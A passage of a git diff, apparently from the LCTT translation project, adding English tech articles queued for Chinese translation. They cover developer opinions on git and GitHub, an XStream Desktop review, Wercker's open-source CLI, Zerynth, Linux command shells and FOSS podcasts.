+>[https://desktop.github.com/](http://api.viglink.com/api/click?format=go&jsonp=vglnk_145580415025712&key=0a7039c08493c7c51b759e3d13019dbe&libId=iksc5hc8010113at000DL3yrsuvp7&loc=http%3A%2F%2Fwww.infoworld.com%2Farticle%2F3033059%2Flinux%2Fwhat-do-linux-developers-think-of-git-and-github.html&v=1&type=U&out=https%3A%2F%2Fdesktop.github.com%2F&ref=http%3A%2F%2Fwww.linux.com%2Fnews%2Fsoftware%2Fapplications%2F886008-what-do-linux-developers-think-of-git-and-github&title=What%20do%20Linux%20developers%20think%20of%20Git%20and%20GitHub%3F%20%7C%20InfoWorld&txt=https%3A%2F%2Fdesktop.github.com%2F) see here no Linux Support.”
+
+>**Bilog78**: ”A minor update: git hasn't been “made by Linus Torvalds” for a while. The maintainer is Junio C Hamano and the main contributors after him are Jeff King and Shawn O. Pearce.”
+
+>**Fearthefuture**: ”I like git but can't understand why people even use github anymore. From my point of view the only thing it does better than bitbucket are user statistics and the larger userbase. Bitbucket has unlimited free private repos, much better UI and very good integration with other services such as Jenkins.”
+
+>**Thunger**: ”Gitlab.com is also nice, especially since you can host your own instance on your own servers.”
+
+>**Takluyver**: ”Lots of people are familiar with the UI of Github and associated services like Travis, and lots of people already have Github accounts, so it's a good place for projects to be. People also use their Github profile as a kind of portfolio, so they're motivated to put more projects on there. Github is a de facto standard for hosting open source projects.”
+
+>**Tdammers**: ”Serious issue with git would be the UI, which is kind of counterintuitive, to the point that many users just stick with a handful of memorized incantations.
+
+Github: most serious issue here is that it's a proprietary hosted solution; you buy convenience, and the price is that your code is on someone else's server and not under your control anymore. Another common criticism of github is that its workflow isn't in line with the spirit of git itself, particularly the way pull requests work. And finally, github is monopolizing the code hosting landscape, and that's bad for diversity, which in turn is crucial for a thriving free software community.”
+
+>**Dies**: ”How is that the case? More importantly, if that is the case, then what's done is done and I guess we're stuck with Github since they control so many projects.”
+
+>**Tdammers**: ”The code is hosted on someone else's server, "someone else" in this case being github. Which, for an open-source project, is not typically a huge problem, but still, you don't control it. If you have a private project on github, then the only assurance you have that it will remain private is github's word for it. If you decide to delete things, then you can never be sure whether it's been deleted, or just hidden.
+
+Github doesn't control the projects themselves (you can always take your code and host it elsewhere, declaring the new location the "official" one), it just has deeper access to the code than the developers themselves.”
+
+>**Drelos**: ”I have read a lot of praises and bad stuff about Github ([here's an example](http://api.viglink.com/api/click?format=go&jsonp=vglnk_145580428524613&key=0a7039c08493c7c51b759e3d13019dbe&libId=iksc5hc8010113at000DL3yrsuvp7&loc=http%3A%2F%2Fwww.infoworld.com%2Farticle%2F3033059%2Flinux%2Fwhat-do-linux-developers-think-of-git-and-github.html&v=1&out=http%3A%2F%2Fwww.wired.com%2F2015%2F06%2Fproblem-putting-worlds-code-github%2F&ref=http%3A%2F%2Fwww.linux.com%2Fnews%2Fsoftware%2Fapplications%2F886008-what-do-linux-developers-think-of-git-and-github&title=What%20do%20Linux%20developers%20think%20of%20Git%20and%20GitHub%3F%20%7C%20InfoWorld&txt=here%27s%20an%20example)) but my simple noob question is why aren't efforts towards a free and open "version" ?”
+
+>**Twizmwazin**: ”GitLab is sorta pushing there.”
+
+[More at Reddit](http://api.viglink.com/api/click?format=go&jsonp=vglnk_145580429720714&key=0a7039c08493c7c51b759e3d13019dbe&libId=iksc5hc8010113at000DL3yrsuvp7&loc=http%3A%2F%2Fwww.infoworld.com%2Farticle%2F3033059%2Flinux%2Fwhat-do-linux-developers-think-of-git-and-github.html&v=1&out=https%3A%2F%2Fwww.reddit.com%2Fr%2Flinux%2Fcomments%2F45jy59%2Fthe_popularity_of_git_and_github%2F&ref=http%3A%2F%2Fwww.linux.com%2Fnews%2Fsoftware%2Fapplications%2F886008-what-do-linux-developers-think-of-git-and-github&title=What%20do%20Linux%20developers%20think%20of%20Git%20and%20GitHub%3F%20%7C%20InfoWorld&txt=More%20at%20Reddit)
+
+## DistroWatch reviews XStream Desktop 153
+
+XStreamOS is a version of Solaris created by Sonicle. XStream Desktop brings the power of Solaris to desktop users, and distrohoppers might be interested in checking it out. DistroWatch did a full review of XStream Desktop 153 and found that it performed fairly well.
+
+Jesse Smith reports for DistroWatch:
+
+>I think XStream Desktop does a lot of things well. Admittedly, my trial got off to a rocky start when the operating system would not boot on my hardware and I could not get the desktop to use my display's full screen resolution when running in VirtualBox. However, after that, XStream performed fairly well. The installer works well, the operating system automatically sets up and uses boot environments, insuring we can recover the system if something goes wrong. The package management tools work well and XStream ships with a useful collection of software.
+
+>I did run into a few problems playing media, specifically getting audio to work. I am not sure if that is another hardware compatibility issue or a problem with the media software that ships with the operating system. On the other hand, tools such as the web browser, e-mail, productivity suite and configuration tools all worked well.
+
+>What I appreciate about XStream the most is that the operating system is a branch of the OpenSolaris family that is being kept up to date. Other derivatives of OpenSolaris tend to lag behind, at least with desktop software, but XStream is still shipping recent versions of Firefox and LibreOffice.
+
+>For me personally, XStream is missing a few components, like a printer manager, multimedia support and drivers for my specific hardware. Other aspects of the operating system are quite attractive. I like the way the developers have set up LXDE, I like the default collection of software and I especially like the way file system snapshots and boot environments are enabled out of the box. Most Linux distributions, openSUSE aside, have not caught on to the usefulness of boot environments yet and I hope it is a technology that is picked up by more projects.
+
+[More at DistroWatch](http://api.viglink.com/api/click?format=go&jsonp=vglnk_145580434172315&key=0a7039c08493c7c51b759e3d13019dbe&libId=iksc5hc8010113at000DL3yrsuvp7&loc=http%3A%2F%2Fwww.infoworld.com%2Farticle%2F3033059%2Flinux%2Fwhat-do-linux-developers-think-of-git-and-github.html&v=1&out=http%3A%2F%2Fdistrowatch.com%2Fweekly.php%3Fissue%3D20160215%23xstreamos&ref=http%3A%2F%2Fwww.linux.com%2Fnews%2Fsoftware%2Fapplications%2F886008-what-do-linux-developers-think-of-git-and-github&title=What%20do%20Linux%20developers%20think%20of%20Git%20and%20GitHub%3F%20%7C%20InfoWorld&txt=More%20at%20DistroWatch)
+
+## Street Fighter V and SteamOS
+
+Street Fighter is one of the most well known game franchises of all time, and now [Capcom has announced](http://api.viglink.com/api/click?format=go&jsonp=vglnk_145580435418216&key=0a7039c08493c7c51b759e3d13019dbe&libId=iksc5hc8010113at000DL3yrsuvp7&loc=http%3A%2F%2Fwww.infoworld.com%2Farticle%2F3033059%2Flinux%2Fwhat-do-linux-developers-think-of-git-and-github.html&v=1&out=http%3A%2F%2Fsteamcommunity.com%2Fgames%2F310950%2Fannouncements%2Fdetail%2F857177755595160250&ref=http%3A%2F%2Fwww.linux.com%2Fnews%2Fsoftware%2Fapplications%2F886008-what-do-linux-developers-think-of-git-and-github&title=What%20do%20Linux%20developers%20think%20of%20Git%20and%20GitHub%3F%20%7C%20InfoWorld&txt=Capcom%20has%20announced) that Street Fighter V will be coming to Linux and SteamOS in the spring. This is great news for Linux gamers.
+
+Joe Parlock reports for Destructoid:
+
+>Are you one of the less than one percent of Steam users who play on a Linux-based system? Are you part of the even smaller percentage of people who play on Linux and are excited for Street Fighter V? Well, I’ve got some good news for you.
+
+>Capcom has announced via Steam that Street Fighter V will be coming to SteamOS and other Linux operating systems sometime this spring. It’ll come at no extra cost, so those who already own the PC build of the game will just be able to install it on Linux and be good to go.
+
+[More at Destructoid](http://api.viglink.com/api/click?format=go&jsonp=vglnk_145580435418216&key=0a7039c08493c7c51b759e3d13019dbe&libId=iksc5hc8010113at000DL3yrsuvp7&loc=http%3A%2F%2Fwww.infoworld.com%2Farticle%2F3033059%2Flinux%2Fwhat-do-linux-developers-think-of-git-and-github.html&v=1&out=http%3A%2F%2Fsteamcommunity.com%2Fgames%2F310950%2Fannouncements%2Fdetail%2F857177755595160250&ref=http%3A%2F%2Fwww.linux.com%2Fnews%2Fsoftware%2Fapplications%2F886008-what-do-linux-developers-think-of-git-and-github&title=What%20do%20Linux%20developers%20think%20of%20Git%20and%20GitHub%3F%20%7C%20InfoWorld&txt=Capcom%20has%20announced)
+
+Did you miss a roundup? Check the [Eye On Open home page](http://www.infoworld.com/blog/eye-on-open/) to get caught up with the latest news about open source and Linux.
+
+------------------------------------------------------------------------------
+
+via: http://www.infoworld.com/article/3033059/linux/what-do-linux-developers-think-of-git-and-github.html
+
+作者:[Jim Lynch][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.infoworld.com/author/Jim-Lynch/
+
diff --git a/sources/tech/20160222 Achieving Enterprise-Ready Container Tools With Wercker’s Open Source CLI.md b/sources/tech/20160222 Achieving Enterprise-Ready Container Tools With Wercker’s Open Source CLI.md
new file mode 100644
index 0000000000..81f7467719
--- /dev/null
+++ b/sources/tech/20160222 Achieving Enterprise-Ready Container Tools With Wercker’s Open Source CLI.md
@@ -0,0 +1,80 @@
+Achieving Enterprise-Ready Container Tools With Wercker’s Open Source CLI
+===========================================
+
+For enterprises, containers offer more efficient build environments, cloud-native applications and migration from legacy systems to the cloud. But enterprise adoption of the technology -- Docker specifically -- has been hampered by, among other issues, [a lack of mature developer tools][1].
+
+Amsterdam-based [Wercker][2] is one of many early-stage companies looking to meet the need for better tools with its cloud platform for automating microservices and application development, based on Docker.
+
+The company [announced a $4.5 million Series A][3] funding round this month, which will help it ramp up development on an upcoming on-premise enterprise product. Key to its success, however, will be building a community around its newly [open-sourced CLI][4] tool. Wercker must quickly integrate with myriad other container technologies -- open source Kubernetes and Mesos among them -- to remain competitive in the evolving container space.
+
+“By open sourcing our CLI technology, we hope to get to dev-prod parity faster and turn “build once, ship anywhere” into an automated reality,” said Wercker CEO and founder Micha Hernández van Leuffen.
+
+I reached out to van Leuffen to learn more about the company, its CLI tool, and how it’s planning to help grow the pool of enterprise customers actually using containers in production. Below is an edited version of the interview.
+
+### Linux.com: Can you briefly tell us about Wercker?
+
+van Leuffen: Wercker is a container-centric platform for automating the development of microservices and applications.
+
+With Wercker’s Docker-based infrastructure, teams can increase developer velocity with custom automation pipelines using steps that produce containers as artifacts. Once the build passes, users can continue to deploy the steps as specified in the wercker.yml. Continuously repeating these steps allows teams to work in small increments, making it easy to debug and ship faster.
+
+![](https://www.linux.com/images/stories/66866/wercker-cli.png)
+
+### Linux.com: How does it help developers?
+
+van Leuffen: The Wercker CLI helps developers attain greater dev-prod parity. They’re able to release faster and more often because they are developing, building and testing in an environment very similar to that in production. We’ve open sourced the exact same program that we execute in the Wercker cloud platform to run your pipelines.
+
+### Linux.com: Can you point out some of the features and advantages of your tool as compared to competitors?
+
+van Leuffen: Unlike some of our competitors, we’re not just offering Docker support. With Wercker, the Docker container is the unit of work. All jobs run inside containers, and each build artifact can be a Docker container.
+
+Wercker’s Docker container pipeline is completely customizable. A ‘pipeline’ refers to any automated workflow, for instance, a build or deploy pipeline. In those workflows, you want to execute tasks: install dependencies, test your code, push your container, or create a slack notification when something fails, for example. We call these tasks ‘steps,’ and there is no limit to the types of steps created. In fact, we have a marketplace of steps built by the Wercker community. So if you’ve built a step that fits my workflow, I can use that in my pipeline.
+
+Our Docker container pipelines adapt to any developer workflow. Users can use any Docker container out there — not just those made by or for Wercker. Whether the container is on Docker Hub or a private registry such as CoreOS’s Quay, it works with Wercker.
+
+Our competitors range from the classic CI/CD tools to larger-scale DevOps solutions like CloudBees.
+
+### Linux.com: How does it integrate with other cloud technologies?
+
+van Leuffen: Wercker is vendor-agnostic and can automate development with any cloud platform or service. We work closely with ecosystem partners like Mesosphere, Kubernetes and CoreOS to make integrations as seamless as possible. We also recently partnered with Atlassian to integrate the Wercker platform with Bitbucket. More than 3 million Bitbucket users can install the Wercker Pipeline Viewer and view build status directly from their dashboard.
+
+### Linux.com: Why did you open source the Wercker CLI tool?
+
+van Leuffen: Open sourcing the Wercker CLI will help us stay ahead of the curve and strengthen the developer community. The market landscape is changing fast; developers are expected to release more frequently, using infrastructure of increasing complexity. While Docker has solved a lot of infrastructure problems, developer teams are still looking for the perfect tools to test, build and deploy rapidly.
+
+The Wercker community is already experimenting with these new tools: Kubernetes, Mesosphere, CoreOS. It makes sense to tap that community to create integrations that work with our technology – and make that process as frictionless as possible. By open sourcing our CLI technology, we hope to get to dev-prod parity faster and turn “build once, ship anywhere” into an automated reality.
+
+### Linux.com: You recently raised over $4.5 million, so how is this fund being used for product development?
+
+van Leuffen: We’re focused on building out our commercial team and bringing an enterprise product to market. We’ve had a lot of inbound interest from the enterprise looking for VPC and on-premise solutions. While the enterprise is still largely in the discovery stage, we can see the market shifting toward containers. Enterprise software devs need to release often, just like the small, agile teams with whom they are increasingly competing. We need to prove containers can scale, and that Wercker has the organizational permissions and the automation suite to make that process as efficient as possible.
+
+In addition to continuing to invest in our product, we’ll be focusing our resources on market education and developer evangelism. Developer teams are still looking for the right mix of tools to test, build and deploy rapidly (including Kubernetes, Mesosphere, CoreOS, etc.). As an ecosystem, we need to do more to educate and provide the tutorials and resources to help developers succeed in this changing landscape.
+
+### Linux.com: What products do you offer and who is your target audience?
+
+van Leuffen: We currently offer one service level of our product Wercker; however, we’re developing an enterprise offering. Current organizations using Wercker range from startups, such as Open Listings, to larger companies and big agencies, like Pivotal Labs.
+
+
+### Linux.com: What does this recently open-sourced CLI do?
+
+van Leuffen: Using the Wercker Command Line Interface (CLI), developers can spin up Docker containers on their desktop, automate their build and deploy processes and then deploy them to various cloud providers, like AWS, and scheduler and orchestration platforms, such as Mesosphere and Kubernetes.
+
+The Wercker Command Line Interface is available as an open source project on GitHub and runs on both OSX and Linux machines.
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.linux.com/news/enterprise/systems-management/887177-achieving-enterprise-ready-container-tools-with-werckers-open-source-cli
+
+作者:[Swapnil Bhartiya][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linux.com/community/forums/person/61003
+[1]:http://thenewstack.io/adopting-containers-enterprise/
+[2]:http://wercker.com/
+[3]:http://venturebeat.com/2016/01/28/wercker-raises-4-5-million-open-sources-its-command-line-tool/
+[4]:https://github.com/wercker/wercker
+
+
diff --git a/sources/tech/20160301 Viper, the Python IoT Development Suite, is now Zerynth.md b/sources/tech/20160301 Viper, the Python IoT Development Suite, is now Zerynth.md
new file mode 100644
index 0000000000..f732382bc6
--- /dev/null
+++ b/sources/tech/20160301 Viper, the Python IoT Development Suite, is now Zerynth.md
@@ -0,0 +1,35 @@
+(翻译中 by runningwater)
+Viper, the Python IoT Development Suite, is now Zerynth
+============================================================
+
+
+![](http://www.open-electronics.org/wp-content/uploads/2016/02/Logo_Zerynth-636x144.png)
+
+
+The startup that launched the tools to develop embedded solutions in Python language announced the brand change along with the first official release.
+
+>Exactly one year after the Kickstarter launch of the suite for developing Internet of Things solutions in Python language, **Viper becomes Zerynth**. It is definitely a big day for the startup that created a radically new way to approach the world of microcontrollers and connected devices, making professionals and makers able to design interactive solutions with reduced efforts and shorter time.
+
+>“We really believe in the uniqueness of our tools, this is why they deserve an adequate recognition. Viper was a great name for a product, but other notable companies had the same feeling many decades ago, with the result that this term was shared with too many other actors out there. We are grown now, and ready to take off fast and light, like the design processes that our tools are enabling”, says the Viper (now Zerynth), co-founders.
+
+>**Thousands of users** developed amazing connected solutions in just 9 months of life in Beta version. Built to be cross-platform, Zerynth’s tools are meant for high-level design of Internet/cloud-connected devices, interactive objects, artistic installations. They are: **Zerynth Studio**, a browser-based IDE for programming embedded devices in Python with cloud sync and board management features; **Zerynth Virtual Machine**: a multithreaded real-time OS that provides real hardware independence allowing code reuse on the entire ARM architecture; **Zerynth App**, a general purpose interface that turns any mobile into the controller and display for smart objects and IoT systems.
+
+>This modular set of tools, adaptable to different hardware and cloud infrastructures, can dramatically reduce the time to market and the overall development costs for makers, professionals and companies.
+
+>Now Zerynth celebrates its new name launching the **first official release** of the toolkit. Check it here [www.zerynth.com][1]
+
+![](http://www.open-electronics.org/wp-content/uploads/2016/02/Zerynth-Press-Release_Studio-Img-768x432.png)
+
+--------------------------------------------------------------------------------
+
+via: http://www.open-electronics.org/viper-the-python-iot-development-suite-is-now-zerynth/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+OpenElectronics+%28Open+Electronics%29
+
+作者:[Staff ][a]
+译者:[runningwater](https://github.com/runningwater)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.open-electronics.org/author/staff/
+[1]: http://www.zerynth.com/
+
diff --git a/sources/tech/20160303 Top 5 open source command shells for Linux.md b/sources/tech/20160303 Top 5 open source command shells for Linux.md
new file mode 100644
index 0000000000..8705ad2981
--- /dev/null
+++ b/sources/tech/20160303 Top 5 open source command shells for Linux.md
@@ -0,0 +1,90 @@
+翻译中;by ping
+Top 5 open source command shells for Linux
+===============================================
+
+keyword: shell , Linux , bash , zsh , fish , ksh , tcsh , license
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/terminal_blue_smoke_command_line_0.jpg?itok=u2mRRqOa)
+
+There are two kinds of Linux users: the cautious and the adventurous.
+
+On one side is the user who almost reflexively tries out ever new option which hits the scene. They’ve tried handfuls of window managers, dozens of distributions, and every new desktop widget they can find.
+
+On the other side is the user who finds something they like and sticks with it. They tend to like their distribution’s defaults. If they’re passionate about a text editor, it’s whichever one they mastered first.
+
+As a Linux user, both on the server and the desktop, for going on fifteen years now, I am definitely more in the second category than the first. I have a tendency to use what’s presented to me, and I like the fact that this means more often than not I can find thorough documentation and examples of most any use case I can dream up. If I used something non-standard, the switch was carefully researched and often predicated by a strong pitch from someone I trust.
+
+But that doesn’t mean I don’t like to sometimes try and see what I’m missing. So recently, after years of using the bash shell without even giving it a thought, I decided to try out four alternative shells: ksh, tcsh, zsh, and fish. All four were easy installs from my default repositories in Fedora, and they’re likely already packaged for your distribution of choice as well.
+
+Here’s a little bit on each option and why you might choose it to be your next Linux command-line interpreter.
+
+### bash
+
+First, let’s take a look back at the familiar. [GNU Bash][1], the Bourne Again Shell, has been the default in pretty much every Linux distribution I’ve used through the years. Originally released in 1989, bash has grown to easily become the most used shell across the Linux world, and it is commonly found in other unix-like operating systems as well.
+
+Bash is a perfectly respectable shell, and as you look for documentation of how to do various things across the Internet, almost invariably you’ll find instructions which assume you are using a bash shell. But bash has some shortcomings, as anyone who has ever written a bash script that’s more than a few lines can attest to. It’s not that you can’t do something, it’s that it’s not always particularly intuitive (or at least elegant) to read and write. For some examples, see this list of [common bash pitfalls][2].
+
+That said, bash is probably here to stay for at least the near future, with its enormous install base and legions of both casual and professional system administrators who are already attuned to its usage, and quirks. The bash project is available under a [GPLv3][3] license.
+
+### ksh
+
+[KornShell][4], also known by its command invocation, ksh, is an alternative shell that grew out of Bell Labs in the 1980s, written by David Korn. While originally proprietary software, later versions were released under the [Eclipse Public License][5].
+
+Proponents of ksh list a number of ways in which they feel it is superior, including having a better loop syntax, cleaner exit codes from pipes, an easier way to repeat commands, and associative arrays. It's also capable of emulating many of the behaviors of vi or emacs, so if you are very partial to a text editor, it may be worth giving a try. Overall, I found it to be very similar to bash for basic input, although for advanced scripting it would surely be a different experience.
+
+### tcsh
+
+[Tcsh][6] is a derivative of csh, the Berkely Unix C shell, and sports a very long lineage back to the early days of Unix and computing itself.
+
+The big selling point for tcsh is its scripting language, which should look very familiar to anyone who has programmed in C. Tcsh's scripting is loved by some and hated by others. But it has other features as well, including adding arguments to aliases, and various defaults that might appeal to your preferences, including the way autocompletion with tab and history tab completion work.
+
+You can find tcsh under a [BSD license][7].
+
+### zsh
+
+[Zsh][8] is another shell which has similarities to bash and ksh. Originating in the early 90s, zsh sports a number of useful features, including spelling correction, theming, namable directory shortcuts, sharing your command history across multiple terminals, and various other slight tweaks from the original Bourne shell.
+
+The code and binaries for zsh can be distributed under an MIT-like license, though portions are under the GPL; check the [actual license][9] for details.
+
+### fish
+
+I knew I was going to like the Friendly Interactive Shell, [fish][10], when I visited the website and found it described tongue-in-cheek with "Finally, a command line shell for the 90s"—fish was written in 2005.
+
+The authors of fish offer a number of reasons to make the switch, all invoking a bit of humor and poking a bit of fun at shells that don't quite live up. Features include autosuggestions ("Watch out, Netscape Navigator 4.0"), support of the "astonishing" 256 color palette of VGA, but some actually quite helpful features as well including command completion based on the man pages on your machine, clean scripting, and a web-based configuration.
+
+Fish is licensed primarily unde the GPL version 2 but with portions under other licenses; check the repository for [complete information][11].
+
+***
+
+Looking for a more detailed rundown on the precise differences between each option? [This site][12] ought to help you out.
+
+So where did I land? Well, ultimately, I’m probably going back to bash, because the differences were subtle enough that someone who mostly used the command line interactively as opposed to writing advanced scripts really wouldn't benefit much from the switch, and I'm already pretty comfortable in bash.
+
+But I’m glad I decided to come out of my shell (ha!) and try some new options. And I know there are many, many others out there. Which shells have you tried, and which one do you prefer? Let us know in the comments!
+
+
+
+
+via: https://opensource.com/business/16/3/top-linux-shells
+
+作者:[Jason Baker][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/jason-baker
+
+[1]: https://www.gnu.org/software/bash/
+[2]: http://mywiki.wooledge.org/BashPitfalls
+[3]: http://www.gnu.org/licenses/gpl.html
+[4]: http://www.kornshell.org/
+[5]: https://www.eclipse.org/legal/epl-v10.html
+[6]: http://www.tcsh.org/Welcome
+[7]: https://en.wikipedia.org/wiki/BSD_licenses
+[8]: http://www.zsh.org/
+[9]: https://sourceforge.net/p/zsh/code/ci/master/tree/LICENCE
+[10]: https://fishshell.com/
+[11]: https://github.com/fish-shell/fish-shell/blob/master/COPYING
+[12]: http://hyperpolyglot.org/unix-shells
+
diff --git a/sources/tech/20160314 15 podcasts for FOSS fans.md b/sources/tech/20160314 15 podcasts for FOSS fans.md
new file mode 100644
index 0000000000..eae53102ad
--- /dev/null
+++ b/sources/tech/20160314 15 podcasts for FOSS fans.md
@@ -0,0 +1,80 @@
+zpl1025
+15 podcasts for FOSS fans
+=============================
+
+keyword : FOSS , podcast
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/oss_podcasts.png?itok=3KwxsunX)
+
+I listen to a lot of podcasts. A lot. On my phone's podcatcher, I am subscribed to around 60 podcasts... and I think that only eight of those have podfaded (died). Unsurprisingly, a fairly sizeable proportion of those remaining alive-and-well subscriptions are shows with a specific interest or relevance to open source software. As I seek to resurrect my own comatose podcast from the nebulous realm of podfadery, I thought it would be great for us as a community to share what we're listening to.
+
+>Quick digression: I understand that there are a lot of "pod"-prefixed words in that first paragraph. Furthermore, I also know that the term itself is related to a proprietary device that, by most accounts, isn't even used for listening to these web-based audio broadcasts. However, the term 'webcast' died in the nineties and 'oggcast' never gathered a substantial foothold among the listening public. As such, in order to ensure that the most people actually know what I'm referring to, I'm essentially forced to use the web-anachronistic, but publicly recognized term, podcast.
+
+I should also mention that a number of these shows involve grown-ups using grown-up language (i.e. swearing). I've tried to indicate which shows these are by putting a red E next to their names, but please do your own due diligence if you're concerned about listening to these shows at work or with children around.
+
+The following lists are podcasts that I keep in heavy rotation (each sublist is listed in alphabetical order). In the first list are the ones I think of as my "general coverage" shows. They tend to either discuss general topics related to free and open source software, or they give a survey of multiple open source projects from one episode to the next.
+
+- [Bad Voltage][1] E — Regular contributor and community moderator here on Opensource.com, Jono Bacon, shares hosting dutes on this podcast with Jeremy Garcia, Stuart Langridge, and Bryan Lunduke, four friends with a variety of digressing and intersecting opinions. That's the most interesting part of the show for me. Of course, they also do product reviews and cover timely news relevant to free and open source software, but it's the banter that I stick around for.
+
+- [FLOSS Weekly][2] — The Twit network of podcasts is a long-time standby in technology broadcasts. Hosted by Randal Schwartz, FLOSS Weekly focuses on covering one open source project each week, typically by interviewing someone relevant in the development of that project. It's a really good show for getting exposed to new open source tools... or learning more about the programs you're already familiar with.
+
+- [Free as in Freedom][3] — Hosted by Bradley Kuhn and Karen Sandler, this show has a specific focus on legal and policy matters as it relates to both specific free and open source projects, as well as open culture in general. The show seems to have gone on a bit of a hiatus since its last episode in November of 2015, but I for one am immensely hopeful that Free as in Freedom emerges victoriously from its battle with being podfaded and returns to its regular bi-weekly schedule.
+
+- [GNU World Order][4] — I think that this show can be best descrbed as a free and open source variety show. Solo host, Klaatu, spends the majority of each show going in-depth at nearly tutorial level with a whole range of specific software tools and workflows. It's a really friendly way to get an open source neophyte up to speed with everything from understanding SSH to playing with digital painting and video. And there's a video component to the show, too, which certainly helps make some of these topics easier to follow.
+
+- [Hacker Public Radio][5] — This is just a well-executed version of a fantastic concept. Hacker Public Radio (HPR) is a community-run daily (well, working-week daily) podcast with a focus on "anything of interest to hackers." Sure there are wide swings in audio quality from show to show, but it's an open platform where anyone can share what they know (or what they think) in that topic space. Show topics include 3D printing, hardware hacking, conference interviews, and more. There are even long-running tutorial series and an audio book club. The monthly recap episodes are particularly useful if you're having trouble picking a place to start. And best of all, you can record your own episode and add it to the schedule. In fact, they actively encourage it.
+
+My next list of open source podcasts are a bit more specific to particular topics or software packages in the free and open source ecosystem.
+
+- [Blender Podcast][6] — Although this podcast is very specific to one particular application—Blender, in case you couldn't guess—many of the topics are relevant to issues faced by users and developers of open source other softrware programs. Hosts Thomas Dinges and Campbell Barton—both on the core development team for Blender—discuss the latest happenings in the Blender community, sometimes with a guest. The release schedule is a bit sporadic, but one of the things I really like about this particular show is the fact that they talk about both user issues and developer issues... and the various intersections of the two. It's a great way for each part of the community to gain insight from the other.
+
+- [Sunday Morning Linux Review][7] — As it's name indicates, SMLR offers a weekly review of topics relevant to Linux. Since around the end of last year, the show has seen a bit of a restructuring. However, that has not detracted from its quality. Tony Bemus, Mary Tomich, and Tom Lawrence deliver a lot of good information, and you can catch them recording their shows live through their website (if you happen to have free time on your Sundays).
+
+- [LinuxLUGcast][8] — The LinuxLUGcast is a community podcast that's really a recording of an online Linux Users Group (LUG) that meets on the first and third Friday of each month. The group meets (and records) via Mumble and discussions range from home builds with single-board computers like the Raspberry Pi to getting help with trying out a new distro. The LUG is open to everyone, but there is a rotating cast of regulars who've made themselves (and their IRC handles) recognizable fixtures on the show. (Full disclosure: I'm a regular on this one)
+
+- [The Open EdTech Podcast][9] — Thaj Sara's Open EdTech Podcast is a fairly new show that so far only has three episodes. However, since there's a really sizeable community of open source users in the field of education (both in teaching and in IT), this show serves an important and underserved segment of our community. I've spoken with Thaj via email and he assures me that new episodes are in the pipe. He just needs to set aside the time to edit them.
+
+- [The Linux Action Show][10] — It would be remiss of me to make a list of open source podcasts and not mention one of the stallwart fixtures in the space: The Linux Action Show. Chris Fisher and Noah Chelliah discuss current news as it pertains to Linux and open source topics while at the same time giving feature attention to specific projects or their own experiences using various open source tools.
+
+This next section is what I'm going to term my "honorable mention" section. These shows are either new or have a more tangential focus on open source software and culture. In any case, I still think readers of Opensource.com would enjoy listening to these shows.
+
+- [Blender Institute Podcast][11] — The Blender Institute—the more commercial creative production spin-off from the Blender Foundation—started hosting their own weekly podcast a few months ago. In the show, artists (and now a developer!) working at the Institute discuss the open content projects they're working on, answer questions about using Blender, and give great insight into how things go (or occasionally don't go) in their day-to-day work.
+
+- [Geek News Radio][12] E — There was a tangible sense of loss about a year ago when the hosts of Linux Outlaws hung up their mics. Well good news! A new show has sprung from its ashes. In episodes of Geek News Radio, Fab Scherschel and Dave Nicholas have a wider focus than Linux Outlaws did. Rather than being an actual news podcast, it's more akin to an informal discussion among friends about video games, movies, technology, and open source (of course).
+
+- [Geekrant][13] — Formerly known as the Everyday Linux Podcast, this show was rebranded at the start of the year to reflect kind of content that the hosts Mark Cockrell, Seth Anderson, and Chris Neves were already discussing. They do discuss open source software and culture, but they also give their own spin and opinions on topics of interest in general geek culture. Topics have a range that includes everything from popular media to network security. (P.S. Opensource.com content manager Jen Wike Huger was a guest on Episode 164.)
+
+- [Open Source Creative][14] E — In case you haven't read my little bio blurb, I also have my own podcast. In this show, I talk about news and topics that are [hopefully] of interest to artists and creatives who use free and open source tools. I record it during my work commute so episode length varies with traffic, and I haven't quite figured out a good way to do interviews safely, but if you listen while you're on your way to work, it'll be like we're carpooling. The show has been on a bit of hiatus for almost a year, but I've commited to making sure it comes back... and soon.
+
+- [Still Untitled][15] E — As you may have noticed from most of the selections on this list, I tend to lean toward the indie side of the spectrum, preferring to listen to shows by people with less of a "name." That said, this show really hits a good place for me. Hosts Adam Savage, Norman Chan, and Will Smith talk about all manner of interesting and geeky things. From Adam's adventures with Mythbusters to maker builds and book reviews, there's rarely ever a show that hasn't been fun for me to listen to.
+
+So there you go! I'm always looking for more interesting shows to listen to on my commute (as I'm sure many others are). What suggestions or recommendations do you have?
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/life/16/3/open-source-podcasts
+
+作者:[Jason van Gumster][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://opensource.com/users/jason-van-gumster
+[1]: http://badvoltage.org/
+[2]: https://twit.tv/shows/floss-weekly
+[3]: http://faif.us/
+[4]: http://gnuworldorder.info/
+[5]: http://hackerpublicradio.org/
+[6]: https://blender-podcast.org/
+[7]: http://smlr.us/
+[8]: http://linuxlugcast.com/
+[9]: http://openedtechpodcast.com/
+[10]: http://www.jupiterbroadcasting.com/tag/linux-action-show/
+[11]: http://podcast.blender.institute/
+[12]: http://sixgun.org/geeknewsradio
